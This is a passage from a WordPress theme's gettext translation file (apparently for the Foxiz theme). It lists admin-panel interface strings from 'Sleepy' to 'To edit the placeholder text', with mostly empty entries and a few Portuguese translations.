"" #: backend/panels/reaction.php:45 msgid "Sleepy" msgstr "" #: backend/panels/design.php:445 msgid "Slide" msgstr "" #: backend/panels/design.php:442 msgid "Slide Effect" msgstr "" #: backend/panels/ads.php:500 msgid "Slide Up Background" msgstr "" #: backend/panels/ads.php:469 msgid "Slide Up Template Shortcode" msgstr "" #: backend/panels/design.php:418 msgid "Slider Animation" msgstr "" #: backend/panels/page.php:45 backend/panels/single-post.php:185 #: backend/single-metaboxes.php:74 msgid "Small - 860px" msgstr "" #: backend/category-settings.php:248 backend/configs.php:467 #: backend/panels/block-grid.php:347 msgid "Small Grid" msgstr "" #: backend/panels/block-grid.php:357 msgid "small grid" msgstr "" #: backend/panels/single-post.php:1339 msgid "Small Grid 1 (4 Columns)" msgstr "" #: backend/configs.php:848 msgid "Small Rectangle (180x150)" msgstr "" #: backend/configs.php:850 msgid "Small Square (200x200)" msgstr "" #: backend/panels/header.php:89 msgid "Smart Sticky" msgstr "" #: backend/panels/table-contents.php:163 msgid "Smooth Scroll" msgstr "" #: templates/parts.php:618 msgid "SnapChat" msgstr "" #: backend/panels/socials.php:86 msgid "Snapchat URL" msgstr "" #: backend/panels/amp.php:103 backend/panels/footer.php:164 #: backend/panels/header-style.php:36 backend/panels/header-style.php:330 #: backend/panels/header-style.php:581 msgid "Social Icons" msgstr "" #: backend/panels/socials.php:14 backend/panels/socials.php:22 msgid "Social Profiles" msgstr "" #: backend/panels/header.php:373 backend/panels/single-post.php:1627 msgid "Socials List" msgstr "" #: backend/configs.php:612 msgid "Solid Light Gray" msgstr "" #: backend/panels/optimized.php:44 msgid "" "Some 3rd party plugins will load this font icon. Disable it if you have not " "plan to use it." msgstr "" #: backend/class-tgm-plugin-activation.php:345 backend/install-plugins.php:69 msgid "Something went wrong with the plugin API." msgstr "" #: templates/page.php:121 msgid "Something's wrong here..." msgstr "" #: templates/ajax.php:188 templates/blog.php:520 msgid "" "Sorry, but nothing matched your search terms. Please try again with some " "different keywords." msgstr "" "Desculpe, mas nada corresponde aos seus termos de pesquisa. Por favor, tente " "novamente com algumas palavras-chave diferentes." #: backend/install-plugins.php:75 #, php-format msgid "" "Sorry, but you do not have the correct permissions to activate the %s plugin." " Contact the administrator of this site for help on getting the plugin " "activated." msgstr "" #: backend/install-plugins.php:72 #, php-format msgid "" "Sorry, but you do not have the correct permissions to install the %s plugin. " "Contact the administrator of this site for help on getting the plugin " "installed." msgstr "" #: backend/install-plugins.php:77 #, php-format msgid "" "Sorry, but you do not have the correct permissions to update the %s plugin. " "Contact the administrator of this site for help on getting the plugin " "updated." msgstr "" #: templates/parts.php:633 msgid "SoundCloud" msgstr "" #: backend/panels/socials.php:116 msgid "Soundcloud URL" msgstr "" #: backend/class-tgm-plugin-activation.php:2642 msgid "Source" msgstr "" #: backend/single-metaboxes.php:778 msgid "Source Name" msgstr "" #: backend/single-metaboxes.php:783 msgid "Source URL" msgstr "" #: backend/panels/single-post.php:304 msgid "Sources Bar" msgstr "" #: backend/single-metaboxes.php:766 msgid "Sources/Via" msgstr "" #: templates/single/templates.php:670 msgid "SOURCES:" msgstr "Fontes:" #: backend/panels/ads.php:237 msgid "Spacing" msgstr "" #: backend/configs.php:244 backend/panels/single-post.php:537 #: backend/single-metaboxes.php:230 msgid "span" msgstr "" #: backend/single-metaboxes.php:642 msgid "Sponsor Light Logo" msgstr "" #: backend/single-metaboxes.php:636 msgid "Sponsor Logo" msgstr "" #: backend/single-metaboxes.php:629 msgid "Sponsor Name" msgstr "" #: backend/single-metaboxes.php:622 msgid "Sponsor URL" msgstr "" #: backend/panels/single-post.php:1134 templates/entry.php:1201 msgid "Sponsored by" msgstr "" #: backend/panels/block-classic.php:113 backend/panels/block-grid.php:113 #: backend/panels/block-grid.php:278 backend/panels/block-grid.php:443 #: backend/panels/block-grid.php:616 backend/panels/block-grid.php:803 #: backend/panels/block-list.php:121 backend/panels/block-list.php:294 #: backend/panels/block-list.php:475 backend/panels/block-list.php:670 msgid "Sponsored Meta" msgstr "" #: backend/panels/single-post.php:1132 msgid "Sponsored Meta Text" msgstr "" #: backend/panels/single-post.php:1123 backend/single-metaboxes.php:606 #: backend/single-metaboxes.php:611 msgid "Sponsored Post" msgstr "" #: backend/configs.php:851 msgid "Square (250x250)" msgstr "" #: backend/panels/blocks.php:14 msgid "Standard Blog Design" msgstr "" #: backend/single-metaboxes.php:298 msgid "Standard Format" msgstr "" #: backend/single-metaboxes.php:304 msgid "Standard Layout" msgstr "" #: backend/panels/single-post.php:38 msgid "Standard Post Format Layout" msgstr "" #: backend/panels/header.php:207 msgid "Standard Search Form" msgstr "" #: backend/configs.php:48 includes/sidebars.php:70 msgid "Standard Sidebar" msgstr "" #: backend/single-metaboxes.php:508 msgid "Stars (1 > 5)" msgstr "" #: bookmark/templates.php:61 #, php-format msgid "" "Start saving your interested articles by clicking the %s icon and you'll " "find them all here." msgstr "" #: backend/class-tgm-plugin-activation.php:2648 msgid "Status" msgstr "" #: backend/panels/single-post.php:1580 backend/panels/single-post.php:1596 msgid "Sticky Headline" msgstr "" #: backend/panels/header.php:76 backend/panels/header.php:82 msgid "Sticky Menu" msgstr "" #: backend/category-settings.php:311 backend/panels/blog-pages.php:321 #: backend/panels/blog-pages.php:808 backend/panels/blog-pages.php:1222 #: backend/panels/blog-pages.php:1630 backend/panels/blog-pages.php:2122 #: backend/panels/bookmark.php:224 backend/panels/bookmark.php:672 #: backend/panels/page.php:82 backend/panels/sidebar.php:47 #: backend/panels/single-post.php:449 msgid "Sticky Sidebar" msgstr "" #: backend/panels/single-post.php:1582 msgid "" "Sticky the single heading and share on socials list when scrolling down." msgstr "" #: backend/panels/optimized.php:209 msgid "Street Address" msgstr "" #: backend/panels/page.php:33 backend/single-metaboxes.php:61 msgid "Style 1" msgstr "" #: backend/configs.php:72 msgid "Style 1 (Left Menu)" msgstr "" #: backend/configs.php:584 msgid "Style 1 (Right Featured Image)" msgstr "" #: backend/panels/design.php:579 backend/panels/page.php:34 #: backend/single-metaboxes.php:62 msgid "Style 2" msgstr "" #: backend/configs.php:585 msgid "Style 2 (Background Image)" msgstr "" #: backend/panels/design.php:596 msgid "Style 2 (Opacity)" msgstr "" #: backend/configs.php:73 msgid "Style 2 (Right Menu)" msgstr "" #: backend/panels/design.php:580 msgid "Style 3" msgstr "" #: backend/configs.php:74 msgid "Style 3 (Center Menu)" msgstr "" #: backend/configs.php:586 msgid "Style 3 (Minimalist)" msgstr "" #: backend/panels/design.php:581 msgid "Style 4" msgstr "" #: backend/configs.php:75 msgid "Style 4 (Border)" msgstr "" #: backend/panels/design.php:582 msgid "Style 5" msgstr "" #: backend/configs.php:76 msgid "Style 5 (Center Logo)" msgstr "" #: backend/panels/design.php:583 msgid "Style 6" msgstr "" #: backend/panels/design.php:584 msgid "Style 7" msgstr "" #: backend/panels/design.php:585 msgid "Style 8" msgstr "" #: backend/panels/ads.php:215 backend/panels/ads.php:404 msgid "Style Settings" msgstr "" #: backend/category-settings.php:112 backend/panels/blog-pages.php:98 msgid "Sub Categories List" msgstr "" #: backend/mega-menu.php:214 msgid "Sub Label" msgstr "" #: backend/panels/header-style.php:149 backend/panels/header-style.php:227 #: backend/panels/header-style.php:437 backend/panels/header-style.php:516 #: backend/panels/header-style.php:704 backend/panels/header-style.php:782 msgid "Sub Menu - Background Color" msgstr "" #: backend/panels/header-style.php:168 backend/panels/header-style.php:246 #: backend/panels/header-style.php:457 backend/panels/header-style.php:535 #: backend/panels/header-style.php:723 backend/panels/header-style.php:801 msgid "Sub Menu - Hover Text Color" msgstr "" #: backend/panels/header-style.php:160 backend/panels/header-style.php:238 #: backend/panels/header-style.php:449 backend/panels/header-style.php:527 #: backend/panels/header-style.php:715 backend/panels/header-style.php:793 msgid "Sub Menu - Text Color" msgstr "" #: backend/panels/typography.php:924 msgid "Sub-Level Menu Font" msgstr "" #: backend/panels/typography.php:969 msgid "Sub-Level Mobile Menu Font" msgstr "" #: backend/panels/newsletter.php:43 msgid "" "Subscribe to our newsletter and never miss our latest news, podcasts etc." msgstr "" #: backend/panels/design.php:258 msgid "Suffix" msgstr "" #: templates/single/reviews.php:214 msgid "Summary" msgstr "" #: backend/panels/table-contents.php:56 msgid "Support H1" msgstr "" #: backend/panels/table-contents.php:57 msgid "" "Support H1 tag, Turn this option off if you would like to exclude H1 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:63 msgid "Support H2" msgstr "" #: backend/panels/table-contents.php:64 msgid "" "Support H2 tag, Turn this option off if you would like to exclude H2 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:70 msgid "Support H3" msgstr "" #: backend/panels/table-contents.php:71 msgid "" "Support H3 tag, Turn this option off if you would like to exclude H3 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:77 msgid "Support H4" msgstr "" #: backend/panels/table-contents.php:78 msgid "" "Support H4 tag, Turn this option off if you would like to exclude H4 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:84 msgid "Support H5" msgstr "" #: backend/panels/table-contents.php:85 msgid "" "Support H5 tag, Turn this option off if you would like to exclude H5 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:91 msgid "Support H6" msgstr "" #: backend/panels/table-contents.php:92 msgid "" "Support H6 tag, Turn this option off if you would like to exclude H6 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:36 msgid "Support Single Page" msgstr "" #: backend/panels/table-contents.php:29 msgid "Support Single Post" msgstr "" #: backend/panels/design.php:622 msgid "Support upload file type SVG for your website." msgstr "" #: backend/panels/reaction.php:55 msgid "Surprise" msgstr "" #: backend/panels/design.php:621 msgid "SVG Supported" msgstr "" #: backend/panels/design.php:614 msgid "SVG Upload" msgstr "" #: templates/header/templates.php:667 msgid "Switch to Dark" msgstr "" #: templates/header/templates.php:666 msgid "Switch to Light" msgstr "" #: backend/single-metaboxes.php:705 msgid "Table of Content" msgstr "" #: backend/panels/table-contents.php:14 backend/single-metaboxes.php:710 msgid "Table of Contents" msgstr "" #: backend/panels/table-contents.php:132 msgid "Table of Contents Heading" msgstr "" #: backend/category-settings.php:479 backend/panels/block-classic.php:138 #: backend/panels/block-grid.php:138 backend/panels/block-grid.php:303 #: backend/panels/block-grid.php:468 backend/panels/block-grid.php:641 #: backend/panels/block-grid.php:828 backend/panels/block-list.php:146 #: backend/panels/block-list.php:319 backend/panels/block-list.php:500 #: backend/panels/block-list.php:695 backend/panels/blog-pages.php:504 #: backend/panels/blog-pages.php:991 backend/panels/blog-pages.php:1405 #: backend/panels/blog-pages.php:1813 backend/panels/blog-pages.php:2305 #: backend/panels/bookmark.php:403 backend/panels/bookmark.php:851 msgid "Tablet - Hide Entry Meta" msgstr "" #: backend/category-settings.php:449 backend/panels/blog-pages.php:475 #: backend/panels/blog-pages.php:962 backend/panels/blog-pages.php:1376 #: backend/panels/blog-pages.php:1784 backend/panels/blog-pages.php:2276 #: backend/panels/bookmark.php:374 backend/panels/bookmark.php:822 msgid "Tablet - Title Font Size" msgstr "" #: backend/panels/typography.php:59 backend/panels/typography.php:105 #: backend/panels/typography.php:154 backend/panels/typography.php:203 #: backend/panels/typography.php:252 backend/panels/typography.php:301 #: backend/panels/typography.php:350 backend/panels/typography.php:399 #: backend/panels/typography.php:448 backend/panels/typography.php:514 #: backend/panels/typography.php:562 backend/panels/typography.php:617 #: backend/panels/typography.php:660 backend/panels/typography.php:736 #: backend/panels/typography.php:793 backend/panels/typography.php:877 #: backend/panels/typography.php:1063 backend/panels/typography.php:1135 msgid "Tablet Font Size" msgstr "" #: backend/configs.php:405 backend/panels/design.php:271 msgid "tag (Tags)" msgstr "" #: templates/single/templates.php:639 msgid "TAGGED:" msgstr "Tags" #: backend/single-metaboxes.php:198 msgid "Tagline" msgstr "" #: backend/single-metaboxes.php:193 msgid "Tagline & Highlights" msgstr "" #: backend/panels/typography.php:1069 msgid "Tagline Font" msgstr "" #: backend/single-metaboxes.php:219 msgid "Tagline HTML Tag" msgstr "" #: backend/panels/typography.php:1070 msgid "" "Tagline tag will use default H6 tag font settings. Select font values if you " "would like to choose a custom font." msgstr "" #: backend/panels/blog-pages.php:1478 msgid "Tags & Archives" msgstr "" #: templates/entry.php:519 msgid "Tags:" msgstr "" #: backend/panels/single-post.php:795 backend/panels/single-post.php:934 #: backend/panels/single-post.php:1072 backend/panels/single-post.php:1697 #: templates/parts.php:645 msgid "Telegram" msgstr "" #: backend/panels/socials.php:140 msgid "Telegram URL " msgstr "" #: backend/category-settings.php:138 backend/panels/blog-pages.php:129 #: backend/panels/blog-pages.php:666 msgid "Template Display" msgstr "" #: backend/mega-menu.php:200 backend/panels/blog-pages.php:119 #: backend/panels/single-post.php:1402 msgid "Template Shortcode" msgstr "" #: backend/panels/header.php:551 msgid "Text Button" msgstr "" #: backend/category-settings.php:37 backend/panels/design.php:52 #: backend/panels/header-style.php:124 backend/panels/header-style.php:202 #: backend/panels/header-style.php:268 backend/panels/header-style.php:412 #: backend/panels/header-style.php:491 backend/panels/header-style.php:679 #: backend/panels/header-style.php:757 backend/panels/header.php:420 #: backend/panels/header.php:473 backend/panels/header.php:690 #: backend/panels/privacy.php:48 msgid "Text Color" msgstr "" #: backend/panels/footer.php:61 backend/panels/header.php:284 msgid "Text Color Scheme" msgstr "" #: backend/panels/footer.php:63 msgid "Text color scheme will be set to light in the dark mode." msgstr "" #: backend/mega-menu.php:146 msgid "Text Color Scheme: " msgstr "" #: backend/class-tgm-plugin-activation.php:2076 #, php-format msgid "TGMPA v%s" msgstr "" #: backend/panels/header.php:645 msgid "" "The alert bar will not be available if you use a header template. The theme " "provides other ways for you to add any info into the header template via " "HTML, text and button and other blocks." msgstr "" #: backend/panels/amp.php:15 msgid "" "The AMP plugin not found! Accelerated Mobile Pages support, Please install " "and activate Automattic AMP plugin to activate settings below." msgstr "" #: backend/panels/single-post.php:385 msgid "" "The author box requests author information (Users > Profile) for displaying." msgstr "" #: backend/panels/general.php:27 msgid "" "The back to top will be invisible on the mobile because it is not helpful." msgstr "" #: backend/panels/design.php:32 msgid "The category label display in the post listing." msgstr "" #: backend/panels/header.php:334 msgid "The center logo style is best suited for small width logos." msgstr "" #: includes/sidebars.php:71 msgid "The default sidebar of your website" msgstr "" #: backend/panels/heading.php:114 msgid "The default tag is H4." msgstr "" #: backend/panels/optimized.php:92 msgid "" "The dynamic file CSS may not apply immediately on some servers due to the " "server cache." msgstr "" #: backend/install-plugins.php:76 #, php-format msgid "" "The following plugin needs to be updated to its latest version to ensure " "maximum compatibility with Foxiz: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:360 #, php-format msgid "" "The following plugin needs to be updated to its latest version to ensure " "maximum compatibility with this theme: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:400 #: backend/class-tgm-plugin-activation.php:3046 msgid "The following plugin was activated successfully:" msgstr "" #: backend/class-tgm-plugin-activation.php:378 backend/install-plugins.php:74 #, php-format msgid "The following recommended plugin is currently inactive: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:372 backend/install-plugins.php:73 #, php-format msgid "The following required plugin is currently inactive: %1$s." msgstr "" #: backend/panels/typography.php:490 msgid "The font size will use the post entry meta font size setting." msgstr "" #: includes/sidebars.php:97 msgid "The full width section at the top of the footer." msgstr "" #: backend/panels/heading.php:17 msgid "The global heading settings for blocks, widgets, archives." msgstr "" #: backend/panels/header.php:42 msgid "The global settings will apply whole the website." msgstr "" #: backend/panels/header.php:189 msgid "" "The heading will show in the \"More\" section and \"Mobile Header Collapse\" " "section." msgstr "" #: backend/panels/blog-pages.php:2382 msgid "" "The image will be limited at 300px of height. Recommended image height is " "about 600px for the retina screen." msgstr "" #: backend/class-tgm-plugin-activation.php:3601 msgid "" "The installation and activation process is starting. This process may take a " "while on some hosts, so please be patient." msgstr "" #: backend/class-tgm-plugin-activation.php:3597 #, php-format msgid "The installation of %1$s failed." msgstr "" #: backend/class-tgm-plugin-activation.php:3609 msgid "" "The installation process is starting. This process may take a while on some " "hosts, so please be patient." msgstr "" #: backend/panels/single-post.php:46 msgid "" "The layout automatically rollback to the \"Classic\" if featured image isn't " "set." msgstr "" #: backend/panels/ads.php:478 backend/panels/newsletter.php:78 msgid "The period to redisplay the popup when visitors closed it." msgstr "" #: backend/panels/design.php:687 msgid "The recommended value is 1 to 20. Leave blank to set it as the default." msgstr "" #: backend/panels/single-post.php:1277 msgid "" "The related box will not appear on post have number of paragraph less than " "this setting." msgstr "" #: backend/class-tgm-plugin-activation.php:1030 msgid "" "The remote plugin package consists of more than one file, but the files are " "not packaged in a folder." msgstr "" #: backend/class-tgm-plugin-activation.php:1027 msgid "" "The remote plugin package does not contain a folder with the desired slug " "and renaming did not work." msgstr "" #: backend/panels/single-post.php:1169 msgid "The Score (1 > 10)" msgstr "" #: includes/sidebars.php:165 msgid "" "The section at the bottom of the single post content. It usually uses to " "display adverts or the post related shortcode." msgstr "" #: includes/sidebars.php:156 msgid "" "The section at the top of the single post content. It usually uses to " "display adverts" msgstr "" #: backend/panels/design.php:575 msgid "The setting below applies to the post title and hyperlinks." msgstr "" #: backend/panels/design.php:593 msgid "The setting below applies to top level menu items." msgstr "" #: backend/panels/single-post.php:1542 msgid "The setting below will apply to the single post pages." msgstr "" #: backend/panels/blog-pages.php:366 backend/panels/blog-pages.php:853 #: backend/panels/blog-pages.php:1267 backend/panels/blog-pages.php:1675 #: backend/panels/blog-pages.php:2167 msgid "" "The setting will not apply if the selected blog layout does not support the " "selected entry category." msgstr "" #: backend/panels/single-post.php:1268 msgid "" "The setting will not apply to posts have been added shortcode directly into " "content." msgstr "" #: backend/panels/blog-pages.php:590 msgid "The settings below apply the blog page." msgstr "" #: backend/panels/typography.php:637 msgid "The settings below apply to all button on your website." msgstr "" #: backend/panels/typography.php:36 msgid "" "The settings below apply to almost post and page content on your website." msgstr "" #: backend/panels/header-style.php:263 msgid "The settings below apply to the \"Transparent Header 1,2 and 3\"." msgstr "" #: backend/panels/blog-pages.php:2377 msgid "The settings below apply to the 404 page." msgstr "" #: backend/panels/blog-pages.php:1066 msgid "The settings below apply to the author pages." msgstr "" #: backend/panels/typography.php:854 msgid "The settings below apply to the breadcrumb bar." msgstr "" #: backend/panels/header-style.php:18 msgid "The settings below apply to the header style 1, 2 and 3." msgstr "" #: backend/panels/header-style.php:312 msgid "The settings below apply to the header style 4." msgstr "" #: backend/panels/header-style.php:563 msgid "The settings below apply to the header style 5." msgstr "" #: backend/panels/typography.php:594 msgid "" "The settings below apply to the input and textarea form on your website." msgstr "" #: backend/panels/header.php:309 msgid "The settings below apply to the mobile header." msgstr "" #: backend/panels/blog-pages.php:1888 msgid "The settings below apply to the search page." msgstr "" #: backend/panels/page.php:18 msgid "The settings below apply to the single page." msgstr "" #: backend/single-metaboxes.php:300 msgid "" "The settings below apply to the standard post format. Using the " "corresponding panel if you select another post format for this post." msgstr "" #: backend/panels/blog-pages.php:1481 msgid "The settings below apply to the tags and other archive pages." msgstr "" #: backend/panels/logo.php:31 msgid "The settings below apply to whole your website." msgstr "" #: backend/panels/ads.php:174 backend/panels/ads.php:363 msgid "" "The settings below will apply if you choose the \"Custom Image\" ad type." msgstr "" #: backend/panels/ads.php:117 backend/panels/ads.php:306 msgid "The settings below will apply if you choose the \"Script\" ad type." msgstr "" #: backend/panels/blog-pages.php:197 backend/panels/blog-pages.php:245 #: backend/panels/blog-pages.php:299 backend/panels/blog-pages.php:342 #: backend/panels/blog-pages.php:542 backend/panels/blog-pages.php:732 #: backend/panels/blog-pages.php:786 backend/panels/blog-pages.php:829 #: backend/panels/blog-pages.php:1030 backend/panels/blog-pages.php:1146 #: backend/panels/blog-pages.php:1200 backend/panels/blog-pages.php:1243 #: backend/panels/blog-pages.php:1443 backend/panels/blog-pages.php:1554 #: backend/panels/blog-pages.php:1608 backend/panels/blog-pages.php:1651 #: backend/panels/blog-pages.php:1851 backend/panels/blog-pages.php:2046 #: backend/panels/blog-pages.php:2100 backend/panels/blog-pages.php:2143 msgid "" "The settings below will be not available if you use \"Global WP Query " "Template Shortcode\" to build the blog listing." msgstr "" #: backend/category-settings.php:19 msgid "" "The settings below will override on the default settings in \"Theme Options >" " Category\"." msgstr "" #: templates/popup.php:108 msgid "" "The short code is incorrect or empty form. Please check the setting again!" msgstr "" #: backend/panels/typography.php:699 msgid "" "The single headline will use H1 font settings as the default. You can " "override the settings in this panel." msgstr "" #: backend/panels/typography.php:756 msgid "" "The single tagline will use the H2 tag font settings. You can override " "settings in this panel." msgstr "" #: backend/panels/design.php:667 msgid "" "The small border style in featured images and other element whole the " "website." msgstr "" #: backend/panels/single-post.php:1168 msgid "The Star (1 > 5)" msgstr "" #: includes/sidebars.php:87 msgid "The submenu section when hovering on the more button." msgstr "" #: backend/panels/blog-pages.php:198 msgid "" "The theme supports heading dynamic content, Please read the documentation " "for further information." msgstr "" #: backend/panels/breadcrumb.php:16 msgid "" "The theme supports Navxt plugin Yoast SEO and Rank Math SEO breadcrumbs." msgstr "" #: backend/panels/optimized.php:82 msgid "" "The theme will load default fonts to render some elements as heading tags, " "body, meta." msgstr "" #: backend/panels/blog-pages.php:343 backend/panels/blog-pages.php:830 #: backend/panels/blog-pages.php:1244 backend/panels/blog-pages.php:1652 #: backend/panels/blog-pages.php:2144 backend/panels/bookmark.php:244 #: backend/panels/bookmark.php:692 msgid "" "The theme will use \"Standard Blog Design\" settings to render block. You " "can override settings in the panel below." msgstr "" #: backend/single-metaboxes.php:886 msgid "" "The transparent headers is only suitable for layouts: Standard 2, Standard 5," " Video 2 and Audio 2." msgstr "" #: backend/panels/single-post.php:1558 msgid "" "The transparent headers is only suitable with layouts: Standard 2, Video 2 " "and Audio 2." msgstr "" #: backend/single-metaboxes.php:109 msgid "" "The transparent headers is only suitable with the page has a sliders or wide " "image at the top." msgstr "" #: backend/panels/design.php:16 msgid "Theme Design" msgstr "" #: backend/theme-options.php:240 backend/theme-options.php:241 msgid "Theme Options" msgstr "" #: backend/class-tgm-plugin-activation.php:408 msgid "" "There are one or more required or recommended plugins to install, update or " "activate." msgstr "" #: backend/class-tgm-plugin-activation.php:366 #, php-format msgid "There is an update available for: %1$s." msgstr "" #: backend/panels/blog-pages.php:19 msgid "" "These are global category settings. The settings below will apply to all " "category pages." msgstr "" #: backend/panels/block-grid.php:515 msgid "" "These are settings for the boxed grid 1. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-grid.php:702 msgid "" "These are settings for the boxed grid 2. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-list.php:366 msgid "" "These are settings for the boxed list 1. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-list.php:561 msgid "" "These are settings for the boxed list 2. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-classic.php:20 msgid "" "These are settings for the Classic (standard) layout. It will be overridden " "by the \"Block Design\" (for Elementor pages) and \"Blog Design\" (for the " "Blog and Archive pages)." msgstr "" #: backend/panels/block-grid.php:20 msgid "" "These are settings for the Grid 1 (standard). It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-grid.php:185 msgid "" "These are settings for the grid 2 layout. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-list.php:20 msgid "" "These are settings for the list 1 (standard) layout. It will be overridden " "by the \"Block Design\" (for Elementor pages) and \"Blog Design\" (for the " "Blog and Archive pages)." msgstr "" #: backend/panels/block-list.php:193 msgid "" "These are settings for the list 2. It will be overridden by the \"Block " "Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and Archive " "pages)." msgstr "" #: backend/panels/block-grid.php:350 msgid "" "These are settings for the small grid layout. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)" msgstr "" #: backend/panels/design.php:90 msgid "" "These are small elements that display in the post listing ie: author name, " "date, total views, total comments..." msgstr "" #: backend/panels/breadcrumb.php:24 msgid "" "These settings below require to activate Navxt plugin Yoast SEO and Rank " "Math SEO breadcrumbs in order to work." msgstr "" #: bookmark/bookmark.php:174 msgid "This article has been added to reading list" msgstr "" #: bookmark/bookmark.php:190 msgid "This article was removed from reading list" msgstr "" #: bookmark/bookmark.php:209 msgid "This article was removed from your bookmark" msgstr "" #: templates/parts.php:116 #, php-format msgid "" "This block requests at least %s posts, Please add new posts for this query " "or change the block settings: " msgstr "" #: backend/panels/optimized.php:254 msgid "" "This image is used if the post/page being shared does not contain featured " "images." msgstr "" #: backend/panels/single-post.php:1233 msgid "This is a global option to disable all comments on posts & page..." msgstr "" #: backend/panels/sidebar.php:28 msgid "" "This is the global option and will be overridden by individual \"Sidebar " "Position\" settings." msgstr "" #: backend/single-metaboxes.php:284 msgid "" "This option is useful in case you would like to create a custom entry meta." msgstr "" #: backend/panels/newsletter.php:105 msgid "" "This option use for \"Scroll Distance\" mode. Input a distance value (px) " "when visitor scrolling down to show the popup." msgstr "" #: backend/panels/newsletter.php:112 msgid "" "This option use for \"Time Delay\" mode. Input a delay time (ms) value to " "show the popup after the site loaded." msgstr "" #: backend/panels/design.php:329 msgid "" "This option will help you optimize the site speed or increase image quality " "on your website." msgstr "" #: backend/class-tgm-plugin-activation.php:615 msgid "This plugin needs to be updated to be compatible with your theme." msgstr "" #: backend/panels/ads.php:86 msgid "" "This section supports ads in the top header website. For other ad spots, " "please read the theme documentation for further info." msgstr "" #: backend/panels/ads.php:274 msgid "" "This section supports ads inside single post content, after x paragraphs. " "For other ad spots, please read the theme documentation for further info." msgstr "" #: backend/panels/header.php:639 msgid "" "This section will show a small alert or event at the bottom of the " "navigation." msgstr "" #: backend/panels/header.php:264 msgid "This section will show the user bookmark list and latest blog listing." msgstr "" #: backend/panels/header.php:620 msgid "This setting apply to the logout button in the logged user dropdown." msgstr "" #: backend/panels/header.php:61 msgid "" "This setting requires to set \"Use Ruby Template\" in the setting above in " "order to work." msgstr "" #: backend/panels/color.php:125 backend/panels/color.php:142 msgid "This setting will apply to the default mode." msgstr "" #: backend/panels/blog-pages.php:155 msgid "" "This setting will be overridden by \"Global WP Query Template Shortcode\" in " "the individual category setting panel." msgstr "" #: backend/panels/blog-pages.php:121 msgid "" "This setting will be overridden by \"template shortcode\" in the individual " "category setting panel." msgstr "" #: backend/panels/table-contents.php:150 msgid "This setting will not apply to the full width 2 columns layout." msgstr "" #: backend/panels/single-post.php:499 msgid "" "This setting will only apply on the desktop devices. Navigate to " "\"Typography > Entry Category\" to set for tablet mobile devices." msgstr "" #: backend/panels/blog-pages.php:179 backend/panels/blog-pages.php:715 #: backend/panels/blog-pages.php:1130 msgid "" "This setting will override on \"Dashboard > Settings > Reading > Blog pages " "show at most\" setting. It also apply to the \"Global WP Query Template " "Shortcode\"." msgstr "" #: backend/mega-menu.php:198 msgid "This setting will override on above settings." msgstr "" #: backend/panels/blog-pages.php:62 backend/panels/blog-pages.php:628 #: backend/panels/blog-pages.php:1946 msgid "" "This setting will override on the \"Header Style\" setting, Leave it blank " "if you would like to use the \"Header Style\" setting." msgstr "" #: backend/panels/blog-pages.php:47 backend/panels/blog-pages.php:613 #: backend/panels/blog-pages.php:1931 msgid "" "This setting will override on the setting in the header panel. It will not " "apply to the header style 4." msgstr "" #: backend/class-tgm-plugin-activation.php:354 #, php-format msgid "This theme recommends the following plugin: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:348 #, php-format msgid "This theme requires the following plugin: %1$s." msgstr "" #: backend/panels/newsletter.php:97 msgid "Time Delay" msgstr "" #: backend/panels/adblock.php:26 backend/panels/newsletter.php:34 msgid "Title" msgstr "" #: backend/category-settings.php:433 backend/panels/block-classic.php:120 #: backend/panels/block-grid.php:120 backend/panels/block-grid.php:285 #: backend/panels/block-grid.php:450 backend/panels/block-grid.php:623 #: backend/panels/block-grid.php:810 backend/panels/block-list.php:128 #: backend/panels/block-list.php:301 backend/panels/block-list.php:482 #: backend/panels/block-list.php:677 backend/panels/blog-pages.php:460 #: backend/panels/blog-pages.php:947 backend/panels/blog-pages.php:1361 #: backend/panels/blog-pages.php:1769 backend/panels/blog-pages.php:2261 #: backend/panels/bookmark.php:359 backend/panels/bookmark.php:807 msgid "Title HTML Tag" msgstr "" #: backend/class-tgm-plugin-activation.php:2494 #, php-format msgid "To Activate (%s)" msgstr "" #: backend/panels/header.php:121 msgid "" "To add column widgets, navigate to \"Dashboard > Appearance > Widgets > More " "Menu Section\". Please read the documentation for further information." msgstr "" #: backend/panels/footer.php:92 msgid "To add content, please navigate to Appearance > Widgets." msgstr "" #: backend/panels/logo.php:39 msgid "" "To add the favicon, navigate to \"Appearance > Customize > Site Identity > " "Site Icon\". Please read the documentation for further information." msgstr "" #: backend/panels/design.php:40 msgid "" "To edit color for individual category, navigate to \"Admin Dashboard > Posts " "> Categories > Edit\"." msgstr "" #: backend/panels/blog-pages.php:25 msgid "" "To edit for individual category, navigate to \"Admin Dashboard > Posts > " "Categories > Edit\"." msgstr "" #: backend/panels/single-post.php:1550 msgid "" "To edit for individual post, navigate to \"Posts > Edit > Post Options > " "Site Header\"." msgstr "" #: backend/panels/heading.php:29 msgid "" "To edit the heading typography, navigate to \"Typography > Block Heading\"." msgstr "" #: backend/panels/header.php:182 msgid "" "To edit the placeholder text of the search form, navigate to \"Theme Options " "> General > Search Placeholder\"." msgstr "" #: backend/panels/single-post.php:524 